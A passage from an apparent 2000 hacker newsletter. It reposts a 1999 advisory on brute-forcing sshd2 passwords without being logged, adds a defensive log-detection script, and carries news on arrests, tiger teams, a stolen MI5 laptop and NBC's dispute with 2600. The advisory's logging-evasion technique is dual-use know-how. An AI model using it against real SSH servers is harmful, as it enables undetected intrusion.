      http://msgs.securepoint.com/cgi-bin/get/bugtraq9905/75.html
      

      Yes this IS old. But it's here because recently someone was upgrading
      from using ssh1 to ssh2 and almost installed an older version thinking
      that any ssh2 implementation was secure (no names *wink*) so I've put
      this here to remind people who knew and advise those who were unaware
      of the possible threat... - Ed
      
      
      
      Forum:     BUGTRAQ (Admin)
      Date:        1999, May 13 
      From:       Patrick Oonk <patrick@PINE.NL> 
     
      Found this at http://www.jjf.org/advisory/SshdJJFen.txt
     
       - J.J.F. / Hackers Team - Security Advisory
              =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
        Date: 05/09/1999
        Release: 05/14/1999
        Author: Zhodiac <zhodiac@jjf.org>
        URL: http://www.jjf.org
        Application: sshd2 up to 2.0.11
        OS: Unix
        Risk: Risky :), long term could gain system access.
     
        -=-=-=-=-=-=-=-=
         Introduction
        -=-=-=-=-=-=-=-=
     
       In the default installation of sshd2 (up to 2.0.11) there is an
        open way to bruteforce a login/password, without any kind of ip
        logging by the sshd. Version 2.0.12 and newer seem not to be
        vulnerable to this attack, because they log the ip at connection time.
     
        -=-=-=-=-=-=-=-=
         Details
        -=-=-=-=-=-=-=-=
     
       When a ssh client connects to the daemon, it has a number
        (default is three) of attempts to guess the correct password before
        disconnecting. If we shut down the connection before using up the
        number of attempts, the daemon will log neither the connection, the
        password guesses nor the ip of the client.
     
       One crystal clear example:
     
        [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
        zhodiac's password:
        zhodiac's password:
        zhodiac's password:
     
        Disconnected; authentication error.
        [zhodiac@piscis zhodiac]$
     
        In /var/log/messages:
     
           May  9 12:42:53 piscis sshd2[1391]: User authentication failed:
           'Authentication method disabled. (user 'zhodiac', client address
           '192.168.1.1:1344', requested service 'ssh-connection')'
       
       Now we try the bug:
     
        [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
        zhodiac's password:
        zhodiac's password:
        zhodiac's password: FATAL: Received signal 2.
        [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
        zhodiac's password:
        zhodiac's password:
        zhodiac's password: FATAL: Received signal 2.
        [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
        zhodiac's password:
        zhodiac's password:
        zhodiac's password: FATAL: Received signal 2.
        [zhodiac@piscis zhodiac]$
     
       Those "FATAL: Received signal 2." lines are the response to
        interrupting the program with a ^C.
     
       Let's see what syslog did:
     
        May  9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
        May  9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
        May  9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.
     
       No ip, no password guess attempts in the logs!
        So a bruteforce can be done without any kind of logging... Sorry
        script-kiddies, no program available!
     
        -=-=-=-=-=-=-=-=
         Quick Fix
        -=-=-=-=-=-=-=-=
     
       Edit the file sshd2_config (usually at /etc/ssh2), set the value
        of "PasswordGuesses" to 1. With this each time a password is tried it
        will log it in the following way:
     
        May  9 12:46:07 piscis sshd[1308]: User authentication failed:
        'Authentication method disabled. (user 'zhodiac', client address
        '192.168.1.1:1527', requested service 'ssh-connection')'
     
        It is also recommended to set the value of "ListenAddress" so we
        will have more control of which ips can use our ssh service.
     
       A better solution is to upgrade to version 2.0.12 or newer; with
        them, at connection time it will log via syslog in the following way:
     
           May  9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"
     
        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
        zhodiac@jjf.org
     
        http://www.jjf.org
        - J.J.F. / Hackers Team - Security Advisory
        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     
      --
       Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
       Pine Internet B.V.           Consultancy, installation and management
       Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
       -- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
       Excuse of the day: Feature was not beta tested
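      The logging gap in the advisory above still leaves a trace a defender can
      alert on: a run of sshd2 "Remote host disconnected" lines whose pids never
      logged an authentication failure (or, on 2.0.12+, a "connection from" line).
      The following detection script is an added example, not part of the
      advisory or of the ssh2 distribution; its log lines are constructed after
      the advisory's excerpts, the year 1999 is assumed because syslog timestamps
      carry none, and the 30-second gap and threshold of 3 are arbitrary tuning values.

```python
"""Detect the sshd2 'silent disconnect' pattern described in the advisory.

sshd2 up to 2.0.11 writes its 'User authentication failed' line, the only one
carrying the client address, only once all PasswordGuesses are used up.  A
client that drops the connection early leaves nothing but 'Remote host
disconnected: Connection closed.' with no address.  A burst of such lines whose
sshd2 pid never logged an address is worth an alert even with no IP to block.

Added example, not part of the advisory or of the ssh2 distribution; the sample
log lines below are constructed after the excerpts quoted in the advisory.
"""
import re
from datetime import datetime

# Constructed sample, modelled on the syslog excerpts in the advisory.
SAMPLE_LOG = """\
May  9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')'
May  9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May  9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May  9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.
May  9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"
May  9 15:23:40 piscis sshd2[7184]: Remote host disconnected: Connection closed.
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd2?\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ADDR_RE = re.compile(r"client address '(?P<addr>[^']+)'")
CONN_RE = re.compile(r'^connection from "(?P<addr>[^"]+)"')
ASSUMED_YEAR = 1999  # syslog lines carry no year; assumed, used for ordering only


def parse_line(line):
    """Return (timestamp, pid, kind, addr) for an sshd/sshd2 line, else None.

    kind is 'auth_fail' (carries an address), 'connection' (2.0.12+ logs the
    address at connect time), 'disconnect' (no address) or 'other'.
    """
    m = SYSLOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ts = datetime.strptime(f"{m['ts']} {ASSUMED_YEAR}", "%b %d %H:%M:%S %Y")
    pid, msg = int(m["pid"]), m["msg"]
    if msg.startswith("User authentication failed"):
        a = ADDR_RE.search(msg)
        return ts, pid, "auth_fail", (a["addr"] if a else None)
    c = CONN_RE.match(msg)
    if c:
        return ts, pid, "connection", c["addr"]
    if msg.startswith("Remote host disconnected"):
        return ts, pid, "disconnect", None
    return ts, pid, "other", None


def silent_disconnects(lines):
    """Disconnect events whose sshd2 pid never logged a client address.

    Returns a list of (timestamp, pid) in log order.  A pid that logged a
    'connection from' line or an authentication failure is attributable and
    is left out: the normal log already covers those.
    """
    events = [e for e in (parse_line(ln) for ln in lines) if e]
    attributed = {pid for _, pid, kind, _ in events
                  if kind in ("auth_fail", "connection")}
    return [(ts, pid) for ts, pid, kind, _ in events
            if kind == "disconnect" and pid not in attributed]


def disconnect_bursts(lines, gap_seconds=30, threshold=3):
    """Cluster silent disconnects that follow each other within gap_seconds.

    Returns a list of (first_ts, last_ts, count) for clusters of at least
    `threshold` events.  Three guesses per connection and a reconnect every
    few seconds, as in the advisory's session, produce exactly this shape.
    """
    bursts, cluster = [], []

    def flush():
        if len(cluster) >= threshold:
            bursts.append((cluster[0][0], cluster[-1][0], len(cluster)))

    for ts, pid in silent_disconnects(lines):
        if cluster and (ts - cluster[-1][0]).total_seconds() > gap_seconds:
            flush()
            cluster.clear()
        cluster.append((ts, pid))
    flush()
    return bursts


if __name__ == "__main__":
    for first, last, n in disconnect_bursts(SAMPLE_LOG.splitlines()):
        print(f"{n} unattributed sshd2 disconnects between "
              f"{first:%b %d %H:%M:%S} and {last:%H:%M:%S}")
```

      On the sample this reports the three disconnects between 12:44:41 and
      12:44:47 and ignores pid 7184, whose address was logged at connect time.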
     
     @HWA      
     
118.0 BBC:"Outdoing the hackers"
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by MerXor
      Source:http://news2.thls.bbc.co.uk/hi/english/business/newsid%5F689000/689285.stm
      
      
      Friday, 24 March, 2000, 18:02 GMT 
      Outdoing the hackers

      By BBC News Online's Iain Rodger 

      Imagine a team of people spending all their time thinking up ways of 
      hacking into corporate computer networks. 

      Now imagine them, Mission Impossible-style, breaking into the inner 
      sanctum itself - the main computer room. 

      These teams actually exist and, more remarkably, they work largely from 
      within the big firms of accountants. 

      Known as "tiger teams", their brief is to find the holes in the security 
      of their corporate clients before criminal hackers do. 

      Brick trick 

      Jan Babiak is head of Ernst & Young's IT security practice. She told me 
      how one of her firm's tiger teams broke into the computer room of a major 
      North American client, deposited a brick marked "Ernst & Young was here" 
      and left again undetected. 

      They then contacted the firm's bosses and said: "Come and see what we've 
      done." 

      What a great job, don't you think? Kind of James Bond without the 
      disincentive of being shot at. But, of course, it's not quite as simple as 
      that. 

      Most of the time, the teams are methodically trying to crack passwords to 
      find a chink in the armour of supposedly secure sites. 

      Chris Potter, partner in charge of similar operations at Pricewaterhouse 
      Coopers, said his 50-strong UK team mainly tries to replicate the 
      techniques of illegal hackers to probe here and there until weaknesses are 
      identified. 

      Physical break-ins would be rare, he said, and used only when the client 
      had agreed it was appropriate. 

      Jan Babiak also stressed the importance of not being alarmist: "The 
      smartest thing to do is to understand your risks." 

      Then, she said, you can develop cost-effective responses that deal with 
      the risk in a way that "delivers good value to shareholders". Now there's 
      the accountant speaking. 

      How it's done 

      Often using people with backgrounds in military espionage, tiger teams 
      (the name is derived from the American armed forces) use all kinds of 
      tricks to ply their trade. 

      For example, they might mount an attempt to hack into a company round the 
      corner via servers dotted all over the world, making it virtually 
      impossible to detect where the attack is coming from. 

      As the idea is to find the weaknesses in even the most sophisticated 
      security, a wide range of techniques might be used, from wire-tapping to 
      cracking passwords. 

      A small programme might be secreted on the target system which records and 
      transmits keystrokes from given terminals. On the basis that the password 
      is typed within the first 40 keystrokes, it is then relatively easy to 
      find. 

      But, as Chris Potter says, the biggest weaknesses are usually not in the 
      technology but in the "human element", and this is where the other side, 
      known as "social engineering" comes in. 

      In one case, a female member of a tiger team used the age-old weapon of 
      tears to persuade an employee of a target client to give her password 
      details. 

      In another, a visit to an office masquerading as a cleaner was used to 
      obtain information about personal belongings placed around work terminals. 
      Some Arsenal football club pictures were enough of a clue to make cracking 
      the employee's password easy work. 

      Making robust systems 

      Having identified the weaknesses, the team then gives advice on how to 
      change the security system to make it more effective, or even design a 
      system specifically for the client. 

      Ken Cukier, international editor with technology magazine Red Herring, 
      says the tiger teams provide an essential service in developing robust IT 
      infrastructures. 

      The business is certainly growing fast - Ernst & Young's team has 
      quadrupled in size in two years. 

      But Mr Cukier says the talents needed to design a secure system and break 
      that security are not the same, so there needs to be a three-pronged 
      approach to get the best results. 

      He says the tiger teams are great for checking that a system works, but 
      that they tend to rely on long experience of established techniques. 

      Bright young things 

      This can miss out the new ways of hacking being thought up by bright young 
      things messing about with cutting-edge technology on the fringes of 
      Silicon Valley. 

      Many of them do not want to work for multinational firms and have been 
      founding their own internet start-ups, realising that they have highly 
      marketable skills. 

      Mr Cukier says combining the tiger teams with the bright young things, 
      along with awareness of the need for constant monitoring of how hacking 
      techniques are changing, produces the best results. 

      He says: "The best you can ever hope for is to be one step ahead of the 
      hackers." 

      @HWA           
       
119.0 HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      From HNN http://www.hackernews.com/ 
      
      
      contributed by Brian
      Curador (Raphael Gray), suspected of stealing thousands of credit
      cards from at least nine e-commerce sites and posting them to the
      Internet, was arrested in Wales last week. Some of Curador's victims
      included Promobility, a wireless phone merchant in Ontario;
      SalesGate.com in Buffalo, New York; LTA Media LLC in Knoxville,
      Tennessee; and Feelgoodfalls.com in Denver. Curador and his accomplice
      are expected to be charged under Britain's Computer Misuse Act of 1990
      for the theft and fraudulent use of more than 26,000 credit card
      numbers. Additional charges may be filed within the United States.
      (Some news outlets are reporting that Curador got a hold of Bill Gates'
      credit card info. This was proven to be false several weeks ago. It
      looks like the UK Telegraph was the first to mention it, and of course
      several of the wire services picked it up without verifying the
      information. Don't believe everything you read.)
      
      Internet News
      Associated Press - via Yahoo
      Reuters
      BBC
      CNN
      C|Net
      MSNBC
      UK Telegraph
      Attrition.org - Mirrors of Curador's Web Sites
      
      http://www.internetnews.com/ec-news/article/0,2171,4_327181,00.
      http://dailynews.yahoo.com/h/ap/20000324/tc/hackers_england_2.
      http://dailynews.yahoo.com/h/nm/20000324/wr/tech_hackers_1.html
      http://news2.thls.bbc.co.uk/hi/english/uk/wales/newsid%5F689000
      http://www.cnn.com/2000/TECH/computing/03/24/hackers.wales/
      http://news.cnet.com/news/0-1007-200-1583595.html?tag
      http://export.msnbc.com/news/386402.asp
      http://www.telegraph.co.uk/et?ac
      http://www.attrition.org/mirror/attrition/curador.html
      ----------
      
      @HWA
      
      
120.0 HNN:Mar 27th:Inferno Busted in Brazil 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 
      
      contributed by Jackie Chan 
      The Inferno.br, one of the main underground groups in Brazil, was
      dismantled last Tuesday by the Sector of Crimes for the Internet of
      the Civil Policy of Sao Paulo. One of the leaders of the group, known
      as Jamiez Jamiez or JZ, was apprehended at his residence and had his
      computer and all related material confiscated. The Inferno had been
      active since September of 1998 and has taken credit for the defacement
      of several web pages. Agents involved with the case claim that
      Microsoft helped them in gaining access to the groups Hotmail account.
      Investigators expect more arrests of group members in the next few
      days. (Note: Information for this article was gathered from a
      Babelfish Translation and may not be perfect.)
      
      IDG Brazil - Portuguese
      Attrition - Mirrors of Inferno.br Defacements
      
      http://www.uol.com.br/idgnow/inet/inet2000-03-23g.shl
      http://www.attrition.org/mirror/attrition/inferno.html
      ----------      
      
      @HWA
      
121.0 HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by lannachi 
      Payne County prosecutors have accused four Oklahoma State University
      students of computer fraud. The charges arose after the students ran a
      cable from a university computer lab to their rooms in Stout Hall. The
      students were arraigned last week for violation of the computer crimes
      act.
      
      Tulsa World - at bottom of page
      
      http://search.tulsaworld.com/archivesearch/default.asp?WCI
      ----------
      
      Server object error 'ASP 0177 : 800a2330' 

      Server.CreateObject Failed 

      /archivesearch/default.asp, line 13 

      The operation completed successfully. 
      
      ( IOW: it's a 404 ... sorry... BTW if anyone finds, has cached or 
      otherwise stored any missing stories please email the article to me 
      and please reference section # and Issue # ie: 121.0 Issue #52 ... 
      and i'll post it in a future release. Thanks. - Ed )
      
      @HWA
      
122.0 HNN:Mar 27th:PalmPilot WarDialer Released 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Kingpin 
      Vaporware for almost two years, the PalmPilot WarDialer known as TBA
      has been released by Kingpin from L0pht Labs at @Stake. This release
      expands the possibilities of security scanning and is much cheaper
      than commercial alternatives: it is FREE.
      
      L0pht Labs Palm OS Development
      
      http://www.l0pht.com/~kingpin/pilot.html
      ----------
      
      @HWA
      
123.0 HNN:Mar 27th:Mi5 Computer Stolen 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by dubpunk 
      It is crucial to remember that your computer security is only as good
      as your physical security. MI5, the British Secret Service, has
      announced that it will tighten its security procedures after a laptop
      was recently stolen from an agent. MI5 admitted that the laptop may
      contain information related to Northern Ireland but that it does not
      contain any sensitive material.
      
      This is London
      Reuters - via Iwon
      
      http://www.thisislondon.com/dynamic/news/reprint.html?in_review
      http://www.iwon.com/home/technology/tech_article/0,2109,23766|technology|03-24-2000::23:52|reuters,00.html
      ----------
      
      ORA-06550: line 3, column 11: PLS-00306: wrong
      number or types of arguments in call to
     'F_VANILLA_REVIEW' ORA-06550: line 3, column 1:
      PL/SQL: Statement ignored 
      
      (*SIGH* and ho-hum.. not having a lot of luck capturing articles from
       some of these new news sites recently!... 404 again on 1st url ... 
       'thisislondon*' ...sorry... - Ed )
       
       -=-
       
       British Intelligence Laptop Stolen at Station
       March 24, 2000 10:51 am EST

       LONDON (Reuters) - British police said Friday they were hunting a thief
       who had stolen a secret service computer containing confidential
       information on Northern Ireland.

       The laptop computer was snatched while an employee of Britain's domestic
       security service, MI5, was buying a ticket at London's Paddington train
       station.

       "I can confirm that a laptop computer was stolen from the security
       service employee on March 4 at Paddington Underground (station)," said a
       government official who declined to be identified.

       "The information contained in the laptop was well protected and we
       believe it to be secure. We are not prepared to discuss the nature of the
       material."

       The information on the computer was understood to be heavily encrypted
       and was related to the situation in Northern Ireland, but not to refer to
       the state of the peace process or any guerrilla threat.

       A spokesman for Prime Minister Tony Blair said officials were always
       concerned at the loss of any sensitive material, but they were confident
       it was secure and that national security had not been threatened.

       "We believe this is an opportunistic theft and not a deliberate attempt
       to gain access to security service information," he said.

       Asked why agents were walking around with security information on
       computers, the spokesman said there were strict procedures for moving
       classified material. "You can certainly say they've been tightened
       since this incident," he added.

       The Sun newspaper said a squad of 150 police were working around the
       clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait
       and Iraq, a laptop said to have contained war plans was stolen
       from the car of a Royal Air Force officer, who lost his job as a result.

       The latest theft comes as the peace process in Northern Ireland is in 
       disarray. 

       Last month Britain decided to suspend a fledgling home-rule government
       over lack of progress on disarmament by Irish Republican Army guerrillas. 
       
       (For those of you not living in the United Kingdom or Ireland, this is
       a VERY BAD SCENE to have happen, Brits live in fear of the threat of 
       terrorist bomb attacks on a daily basis and any intelligence to help
       the murderous IRA and rogue factions could be devastating to any
       hope of peace in the UK and Northern Ireland ... - Ed)
      
      @HWA
      
124.0 HNN:Mar 27th:"HNN Wins Bad Ass Media Award"
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      contributed by SmackDabMedia Mail 
      The Hacker News Network has won the prestigious Bad Ass Media Site of
      the Week awarded by Smack Dab Media.
      
      Smack Dab Media
      
      http://www.smackdabmedia.com/badassmediasiteoftheweek.html?004
      ----------
      
      (Sorry! article has moved! who knows where!? - Ed ...)
      
      
      @HWA
   
125.0 HNN:Mar 28th:French Ban Anonymous Internet 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      The French National Assembly has voted on a bill to ban anonymous web
      hosting. Providing false information to an Internet service provider
      could result in a six month jail sentence. The Assembly will take one
      more vote on the bill before it becomes law.
      
      French National Assembly - PDF in French
      
      http://www.assemblee-nat.fr/2/pdf/ta0473-01.pdf
      ----------
      
      @HWA
      
126.0 HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by William Knowles 
      An American intelligence agency has determined that up to 80 percent
      of foreign attacks on U.S. computers either originate or pass through
      Canada. The claim follows suspicions that some recent attacks were
      routed through Canadian computers.
      
      E-Commerce Times
      News Bytes
      
      http://www.ecommercetimes.com/news/articles2000/000327-nb1.shtml
      http://www.newsbytes.com/pubNews/00/146343.html
      ----------      

      Canada Called Hotbed of Cyberterrorism By Martin Stone, Newsbytes Special 
      to the E-Commerce Times March 27, 2000 

      An American intelligence agency has determined that up to 80 percent of
      foreign attacks on U.S. computers either originate or pass through
      Canada. The claim follows suspicions that some recent hacker attacks were
      routed through Canadian computers.

      A weekend article by the Ottawa Citizen newspaper said a report prepared
      last year for Canada's Department of National Defence quotes the U.S.
      Defence Intelligence Agency, the military counterpart to the CIA, as
      warning that Canada is seen as a "Zone of Vulnerability."

      The U.S. Defence Intelligence Agency estimates that a full 80 percent of
      the attacks upon U.S. systems originate in or pass through Canada, the
      report stated. The Citizen noted that the report, prepared by
      Canadian military and intelligence agencies, including the ultra-secret
      Communications Security establishment, further said, "It is the assessment
      of the (Canadian government's) Intelligence Policy Group that the United
      States and our allies will expect Canada to participate in combating and
      reducing the cyber threat."

      Hacker Haven

      FBI Director Louis Freeh recently called Canada a "hacker haven." FBI
      investigators believe one or more Canadian Internet servers were used in
      the attacks that recently disabled Yahoo!, eBay and other U.S.-based
      commercial sites.

      Colonel Randy Alward, commander of the Canadian Forces Information
      Operations Group, is quoted by the newspaper as saying the high number of
      hacker attacks coming from Canada is due to a high degree of
      computerization. The colonel is reported as saying that Canada is a very
      wired country and that hackers will typically bounce through different
      computer systems to hide their original location.

      Welsh Teens Stage Attacks

      The newspaper noted that Canadians, too, can also be the victims of
      cybercrimes and cited reports of two teenagers in Wales who were recently
      arrested following an international investigation by the FBI and the
      Royal Canadian Mounted Police.

      The 18-year-olds allegedly used the alias "Curador" to hack into nine
      e-commerce sites, at least one of which was Canadian, from which they are
      believed to have stolen more than 26,000 credit card numbers and
      other personal information, and posted some of it to other hackers.

      The Citizen said the cost of canceling the cards and issuing new ones will
      exceed $3 million (US$), and there may be additional losses if the
      information was used by others to make purchases.

      However, Sam Porteous, director of intelligence for Kroll Associates
      Canada, a corporate security firm, warned against taking the intelligence
      estimates too seriously, saying the military often uses broad
      definitions of what constitutes a cyberattack. He conceded, though, that
      Americans have valid concerns about Canada, seeing the country as a
      conduit they don't have control over, and that unnerves them, he told the
      newspaper.

      The Citizen cites other cyberwarfare specialists who acknowledge that
      Canada has a large population of computer literate citizens but question
      whether the number of Canadian-launched attacks is as high as the
      intelligence report suggests. Thomas Welch of JAWS Technologies, a
      computer security firm with U.S. and Canadian offices, said he believes
      the report overstates Canada's role in cyberterrorism and that, while a
      good percentage does go through or come from Canada, a large percentage of
      attacks on Canadian sites go via the United States.
      
      -=-
      
      We have some packet kiddies and wannabe crackers make the news and now
      we're public enemy #1 ... phear Canada .. *gag* (kill the media) - Ed
      now excuse me while I load the molson's canadian into my igloo off the
      skidoo trailer and club some baby seals for supper ... :-o
      
      =-=
      
      Canada Called Hotbed Of Cyberterrorism 
      
      By Martin Stone, Newsbytes OTTAWA, ONTARIO, CANADA, 27 Mar 2000, 8:41 AM 
      CST

      An American intelligence agency has determined that up to 80 percent of 
      foreign attacks on US computers either originate or pass through Canada. 
      The claim follows suspicions that some recent hacker attacks were routed 
      through Canadian computers. 

      A weekend article by the Ottawa Citizen newspaper said a report prepared 
      last year for Canada's Department of National Defence quotes the US 
      Defence Intelligence Agency, the military counterpart to the CIA, as 
      warning that Canada is seen as a "Zone of Vulnerability." 

      The US Defence Intelligence Agency estimates that a full 80 percent of the 
      attacks upon US systems originate in or pass through Canada, the report 
      stated. The Citizen noted that the report, prepared by Canadian military 
      and intelligence agencies, including the ultra-secret Communications 
      Security establishment, further said, "It is the assessment of the 
      (Canadian government's) Intelligence Policy Group that the United States 
      and our allies will expect Canada to participate in combating and reducing 
      the cyber threat." 

      FBI Director Louis Freeh recently called Canada a "hacker haven." FBI 
      investigators believe one or more Canadian Internet servers were used in 
      the attacks that recently disabled Yahoo.com, eBay and other US-based 
      commercial sites. 

      Colonel Randy Alward, commander of the Canadian Forces Information 
      Operations Group, is quoted by the newspaper as saying the high number of 
      hacker attacks coming from Canada is due to a high degree of 
      computerization. The colonel is reported as saying that Canada is a very 
      wired country and that hackers will typically bounce through different 
      computer systems to hide their original location. 

      The newspaper noted that Canadians, too, can also be the victims of 
      cybercrimes and cited reports of two teenagers in Wales who were recently 
      arrested following an international investigation by the FBI and the Royal 
      Canadian Mounted Police. 

      The 18-year-olds allegedly used the alias "Curador" to hack into nine 
      e-commerce sites, at least one of which was Canadian, from which they are 
      believed to have stolen more than 26,000 credit card numbers and other 
      personal information, and posted some of it to other hackers. 

      The Citizen said the cost of canceling the cards and issuing new ones will 
      exceed $3 million, and there may be additional losses if the information 
      was used by others to make purchases. 

      However, Sam Porteous, director of intelligence for Kroll Associates 
      Canada, a corporate security firm, warned against taking the intelligence 
      estimates too seriously, saying the military often uses broad definitions 
      of what constitutes a cyberattack. He conceded, though, that Americans have 
      valid concerns about Canada, seeing the country as a conduit they don't 
      have control over, and that unnerves them, he told the newspaper. 

      The Citizen cites other cyberwarfare specialists who acknowledge that 
      Canada has a large population of computer-literate citizens but question 
      whether the number of Canadian-launched attacks is as high as the 
      intelligence report suggests. Thomas Welch of JAWS Technologies, a 
      computer security firm with US and Canadian offices, said he believes the 
      report overstates Canada's role in cyberterrorism and that, while a good 
      percentage does go through or come from Canada, a large percentage of 
      attacks on Canadian sites go via the US. 

      Reported by Newsbytes.com, http://www.newsbytes.com . 

      08:41 CST
      Reposted 08:59 CST 
      
      
      @HWA
      
127.0 HNN:Mar 28th:2600 Under Fire From NBC 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      
      contributed by acopalyse 
      NBC is not happy with 2600 Magazine. 2600 has gone and registered
      fucknbc.com and pointed the domain at nbc.com. NBC somehow feels this is
      a dilution and inappropriate use of their trademark while 2600
      rightfully asserts that it is nothing more than a free speech issue.
      
      2600
      ZD Net
      
      http://www.2600.com/news/2000/0323.html
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2475126,00.html?chkpt
      ----------
      
      (fucknbc.com? wait for it ... *snicker* ... Emmanuel, what a rebel.. - Ed)
      
      NEW LAWSUIT THREAT FROM NBC 

      03/23/00 

      Apparently the corporate media feels it not only owns the Internet, but 
      that it can control opinions and expression as well. 

      Late Wednesday, we received the following letter via email. It concerned 
      one of many "freedom of expression" sites that 2600 is involved with. 

           ----- Forwarded message ----- 

           From: "Lusins, Gillian (NBC)" Gillian.Lusins@nbc.com 
           To: "'emmanuel@2600.com'" emmanuel@2600.com 
           Subject: Website 
           Date: Wed, 22 Mar 2000 17:43:47 -0500 
           X-Mailer: Internet Mail Service (5.5.2448.0)

           Dear Mr. Goldstein, 

           I am counsel to National Broadcasting Company, Inc. You are listed as 
           the technical contact for the following site: www.fucknbc.com. The 
           site is currently listed as belonging to "CORE - THE INTERNET COUNCIL 
           OF REGISTRARS, and the site is currently pointing to NBC.com. The use 
           of NBC's name in this domain name constitutes trademark infringement, 
           and is also a violation of our copyright interest in the NBC.com 
           site. Please be aware that a letter is being sent to the listed 
           owners of this site, and that if the site is not taken down 
           immediately, and arrangements made to cease and discontinue all use 
           of this name, we will pursue all necessary legal remedies including 
           instituting litigation in the appropriate venues. Please contact me 
           to discuss this matter upon receipt of this letter at 
           gillian.lusins@nbc.com. Thank you. 

           Gillian Lusins 

           Because e-mail can be altered electronically, the integrity of this 
           communication cannot be guaranteed. 

           ----- End forwarded message ----- 

      It's clear to us that the people at NBC have become separated from some 
      key bits of logic so we will try and help them out. 

      Free speech is at the heart of the net. While companies and other entities 
      are entitled to protect their trademarks, it is entirely acceptable for 
      sites like www.aolsucks.com, www.fuckfrance.com, and even 
      www.fuckgeorgewbush.com to exist without fear of harassment. We invite NBC 
      (or anyone else, but let's give them first crack at it) to register 
      fuck2600.com or 2600sucks.com. And if we feel like registering 
      www.nbcsucksbecausetheyhavelawyerswithtoomuchtimeontheirhands.com, no 
      legal threat is going to convince us not to fight for this very 
      fundamental freedom. 

      We think NBC may have been confused because we were pointing 
      www.fucknbc.com to www.nbc.com. Perhaps they thought we had STOLEN their 
      web site. We've seen bigger leaps in corporate logic so this conclusion is 
      entirely possible. Let us be clear - we were merely POINTING one site to 
      another, something that is perfectly acceptable in the world of the 
      Internet. If your mortal enemy decides to point his/her site at your site, 
      there's not a damn thing you can do about it, nor should you want to. It's 
      how the net works. But, since NBC has brought it up, we would like to have 
      this site do something more than what it's doing now. As a first step 
      towards this, we have pointed the site to this new material they so 
      graciously provided us with. We would like to see a more comprehensive 
      fucknbc site become established. Please email us if you'd like to put 
      together such a site. 

      And if NBC has the guts to apologize, we'll post
      that too.      
      
      -=-
      
      NBC attacks critical domain name

      2600.org no longer points to the Peacock's site, but hacker newsletter 
      says it's another case of cyber bullying and an attack on free Web 
      speech.

      By Lisa M. Bowman, ZDNet News
      March 27, 2000 2:45 PM PT 

      The hacker newsletter 2600.org has stopped pointing the domain name 
      f--knbc.com to the official NBC Web site after the media company 
      threatened to sue.
      
      NBC alleges that the 2600 site violated both its trademark and copyright 
      interests. 2600 has owned the domain name since late last year.

      In an e-mail message to Emmanuel Goldstein, who runs the 2600 site, NBC 
      goes further than just requesting that 2600 stop pointing to NBC. It also 
      claims that the use of NBC's name in this way violates the law, an 
      assertion that raises free-speech issues.

      "If the site is not taken down immediately, and arrangements made to cease 
      and discontinue all use of this name, we will pursue all necessary legal 
      remedies including instituting litigation in the appropriate venture," the 
      message from NBC attorney Gillian Lusins reads.

      NBC officials could not immediately be reached for comment.

      Can ICANN intervene?

      Goldstein said he hasn't received a physical letter, and that this is 
      just one of many such battles his group is fighting.

      "We're seeing a disturbing increase in corporate intimidation," said 
      Goldstein, who added that 2600.org only changed the URL's destination to 
      call out attention to NBC's ploy. "People need to not buckle to these 
      scare tactics." 

      The letter comes as board members of ICANN -- the nonprofit private 
      corporation charged with doling out domain names -- are deciding whether 
      to add more top-level domains to the current selection that includes .com, 
      .org and others. 

      Some nonprofit stakeholders, such as Ralph Nader's Consumer Project on 
      Technology, have proposed adding words such as ".sucks" and ".isnotfair," 
      so that people critical of a particular company or organization would have 
      a place to express their opinion.

